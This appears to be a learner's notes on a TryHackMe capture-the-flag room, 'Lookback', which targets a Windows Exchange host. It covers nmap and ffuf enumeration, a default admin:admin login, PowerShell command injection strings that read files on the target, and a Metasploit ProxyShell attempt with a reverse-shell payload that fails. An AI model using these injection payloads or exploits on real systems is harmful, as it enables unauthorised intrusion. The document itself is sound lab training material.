Lookback -- Tryhackme -- Easy -- 20 Nov 2024 -- 1hr 50min
https://tryhackme.com/r/room/lookback

Add lookback.thm to /etc/hosts

---- Enumeration

-- Nmap Scan
                                                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC lookback.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 10:32 EST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 89.30% done; ETC: 10:32 (0:00:01 remaining)
Nmap scan report for lookback.thm (10.10.178.77)
Host is up (0.16s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/https
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local
| Not valid before: 2023-01-25T21:34:02
|_Not valid after:  2028-01-25T21:34:02
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Not valid before: 2024-11-19T15:31:10
|_Not valid after:  2025-05-21T15:31:10
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: WIN-12OUO7A66M7
|   DNS_Domain_Name: thm.local
|   DNS_Computer_Name: WIN-12OUO7A66M7.thm.local
|   DNS_Tree_Name: thm.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-20T15:33:17+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 12s, deviation: 0s, median: 12s
| smb2-time: 
|   date: 2024-11-20T15:33:16
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.26 seconds                                                                                                                                                       

Add WIN-12OUO7A66M7.thm.local to /etc/hosts

---- Website 
 80 and 443
 Visting 80 Not found anything then 443 found an outlook login 
 
 Then directory bruteforcing found test directory 
 ┌──(kali㉿kali)-[~]
└─$ ffuf -u https://win-12ouo7a66m7.thm.local/FUZZ -w /usr/share/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -fw 1    

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://win-12ouo7a66m7.thm.local/FUZZ
 :: Wordlist         : FUZZ: /usr/share/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

test                    [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 159ms]
Test                    [Status: 401, Size: 1293, Words: 81, Lines: 30, Duration: 189ms]
owa                     [Status: 302, Size: 233, Words: 6, Lines: 4, Duration: 157ms]

test directory has login admin:admin work 

We got service flag after login
THM{Security_Through_Obscurity_Is_Not_A_Defense}

Then after flag I tried powershell Injection seeing walkthrough
Its my first windows machine

BitlockerActiveMonitoringLogs') ; dir #('
BitlockerActiveMonitoringLogs') ; type C:\Users\dev\Desktop\user.txt #('

I got user flag
THM{Stop_Reading_Start_Doing}

Then see an Interesting todo list
BitlockerActiveMonitoringLogs') ; type C:\Users\dev\Desktop\TODO.txt #('

after seeing todo list 
Wappalyzer > Exchange 15.2.858 > Microsoft Exchange ProxyShell RCE https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/ 

┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: Display the Framework log using the log command, learn 
more with help log
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.4.18-dev                          ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post       ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

search exchange promsf6 > search exchange proxy

Matching Modules
================

   #   Name                                             Disclosure Date  Rank       Check  Description
   -   ----                                             ---------------  ----       -----  -----------
   0   auxiliary/gather/exchange_proxylogon_collector   2021-03-02       normal     No     Microsoft Exchange ProxyLogon Collector
   1     \_ action: Dump (Contacts)                     .                .          .      Dump user contacts from exchange server
   2     \_ action: Dump (Emails)                       .                .          .      Dump user emails from exchange server
   3   exploit/windows/http/exchange_proxylogon_rce     2021-03-02       excellent  Yes    Microsoft Exchange ProxyLogon RCE
   4     \_ target: Windows Powershell                  .                .          .      .
   5     \_ target: Windows Dropper                     .                .          .      .
   6     \_ target: Windows Command                     .                .          .      .
   7   auxiliary/scanner/http/exchange_proxylogon       2021-03-02       normal     No     Microsoft Exchange ProxyLogon Scanner
   8   exploit/windows/http/exchange_proxynotshell_rce  2022-09-28       excellent  Yes    Microsoft Exchange ProxyNotShell RCE
   9     \_ target: Windows Dropper                     .                .          .      .
   10    \_ target: Windows Command                     .                .          .      .
   11  exploit/windows/http/exchange_proxyshell_rce     2021-04-06       excellent  Yes    Microsoft Exchange ProxyShell RCE
   12    \_ target: Windows Powershell                  .                .          .      .
   13    \_ target: Windows Dropper                     .                .          .      .
   14    \_ target: Windows Command                     .                .          .      .

Module options (exploit/windows/http/exchange_proxyshell_rce):show options

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   EMAIL                              no        A known email address for this organization
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             443              yes       The target port (TCP)
   SSL               true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                            no        The URI to use for this exploit (default is random)
   UseAlternatePath  false            yes       Use the IIS root dir as alternate path
   VHOST                              no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on
                                        all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Powershell



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 10.8.6.102
LHOST => 10.8.6.102
msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOST 10.10.106.227
RHOST => 10.10.106.227
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL dev-infrastracture-team@thm.local
EMAIL => dev-infrastracture-team@thm.local
msf6 exploit(windows/http/exchange_proxyshell_rce) > run

[*] Started reverse TCP handler on 10.8.6.102:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: win-12ouo7a66m7.thm.local
[-] Exploit aborted due to failure: unexpected-reply: Failed to access the PowerShell backend
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/exchange_proxyshell_rce) > 

I tried all but not work I do not know what is this remain lets try after some time

New Topics to learn - Powershell Injection

